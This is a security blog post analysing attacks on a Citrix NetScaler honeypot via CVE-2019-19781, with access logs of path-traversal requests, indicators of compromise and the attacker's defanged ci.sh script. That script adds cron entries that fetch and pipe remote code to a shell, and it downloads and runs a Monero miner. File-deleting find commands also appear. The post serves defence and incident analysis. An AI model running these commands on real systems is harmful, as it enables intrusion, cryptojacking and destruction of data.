TrustedSec - NetScaler Honeypot

The Citrix NetScaler remote code execution vulnerability (CVE-2019-19781) has been a pretty popular topic over the last few weeks. Once public exploits of the vulnerability started to appear in the wild, TrustedSec deployed a Citrix NetScaler honeypot. We did not have to wait long for the attacks to begin. Less than 24 hours after deployment, the honeypot was compromised for the first time.

January 12, 2020 Compromise

The first compromise came from IP address 193.187.174.104 and started with the attacker accessing the smb.conf file using the directory traversal attack. This is a good litmus test for the attackers to see if a system is vulnerable and was often seen before an attack occurred.

193.187.174.104 - - [12/Jan/2020:11:26:02 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83 "-"

Shortly after, the HTTP access logs recorded a number of POSTs to newbm.pl followed by a GET to an XML file. This indicates the attacker used the Project India exploit, in which the tool executes a command through the vulnerability and places the output into an XML file. The XML file is then requested by the tool to show the output to the attacker.

193.187.174.104 - - [12/Jan/2020:11:26:03 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:04 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:11 +0000] "GET /vpn/../vpns/portal/AOUnCfwrjIJrpngpwLXHddqADAxTraBan.xml HTTP/1.1" 200 - "-"

Fortunately, to see what the attacker executed we only have to view the XML file left over in the /netscaler/portal/templates directory. From analysis of the XML files, the attacker ran “cat /etc/passwd” multiple times and then downloaded and ran a script named ci.sh (defanged and shown below).

!/bin/sh
 LDR="wget -q -O -"
 if [ -s /usr/bin/curl ]; then
   LDR="curl"
 fi
 if [ -s /usr/bin/wget ]; then
   LDR="wget -q -O -"
 fi
 crontab -l | grep -e "185.178.45.221" | grep -v grep
 if [ $? -eq 0 ]; then
   echo "cron good"
 else
   (
     crontab -l 2>/dev/null
     echo "* * * * * $LDR hxxp://185[.]178[.]45[.]221/ci.sh | sh > /dev/null 2>&1"
   ) | crontab -
 fi
 crontab -l | grep -e "62.113.112.33" | grep -v grep
 if [ $? -eq 0 ]; then
   echo "cron good"
 else
   (
     crontab -l 2>/dev/null
     echo "* * * * * $LDR hxxp://62[.]113[.]112[.]33/ci.sh | sh > /dev/null 2>&1"
   ) | crontab -
 fi
 download() {
    curl -o /var/tmp/netscalerd hxxp://217[.]12[.]221[.]12/netscalerd
 }
 if [ ! "$(ps -ax|grep '/var/tmp/netscalerd'|grep -v grep)" ];
 then
     download
     chmod +x /var/tmp/netscalerd
     nohup /var/tmp/netscalerd > /dev/null 2>&1 &
     sleep 5
     rm -rf /var/tmp/netscalerd
 else
     echo "Running"
 fi

The script performs two (2) tasks. The first is to check cron to make sure the that the backdoor entries are still present. If not, they are added back in. The backdoor entries are pretty simple—every minute they will download a new version of ci.sh from two (2) different IP addresses and execute them. Since the backdoor uses the Bourne shell, everything is logged in /var/log/sh.log.

The script verifies whether the program named netscalerd is running; if not, the program is downloaded and executed. After execution, the program is deleted. This is a common UNIX anti-forensics technique since, unlike Windows, programs can be deleted after they are executed and will continue to run.

Analysis of netscalerd (MD5 5be9abbe208a1e03ef3def7f9fa816d3) found that it is the Monero coin miner, XMRig 5.5.0.

The ci.sh backdoor was also used to execute commands other than the script above. After the backdoor had been active for around 36 hours, the following commands were executed:

find /netscaler/portal/scripts -type f -newermt 1/07/2019 0:00:00 -exec rm -rf {} ;
 find /netscaler/portal/templates -type f -newermt 1/07/2019 0:00:00 -exec rm -rf {} ;
 mv /netscaler/portal/scripts/newbm.pl /netscaler/portal/scripts/newbmnnn.pl

These commands deleted any files in the /netscaler/portal/scripts and /netscaler/portal/templates directories newer than January 07, 2019 and renamed the newbm.pl file to newbmnnn.pl. The newbm.pl allows remote code execution. Interestingly, this ended up deleting all of the files in these two (2) directories, which may or may not have been the intent of the attacker. Fortunately, we had made a backup of those directories.

Shortly after this occurred, the sites containing ci.sh no longer served them, so this could have been the attacker’s way to go dark.

Conclusion

Thus far we have not seen any more activity, but it is only a matter of time. Other sources have reported additional activity, so we expect more to come as time goes on. As we get more action, we will update this post with new information.

Indicators of Compromise

62.113.112.33
185.178.45.221
193.187.174.104
217.12.221.12

0e431d0d9e0fc371c163e4de5226c50b – ci.sh

5be9abbe208a1e03ef3def7f9fa816d3 – netscalerd

References

https://nvd.nist.gov/vuln/detail/CVE-2019-19781#vulnCurrentDescriptionTitle

The post NetScaler Honeypot appeared first on TrustedSec.



from TrustedSec https://www.trustedsec.com/blog/netscaler-honeypot/

Comments

Popular posts from this blog

Krebs - NY Charges First American Financial for Massive Data Leak

KnowBe4 - Scam Of The Week: "When Users Add Their Names to a Wall of Shame"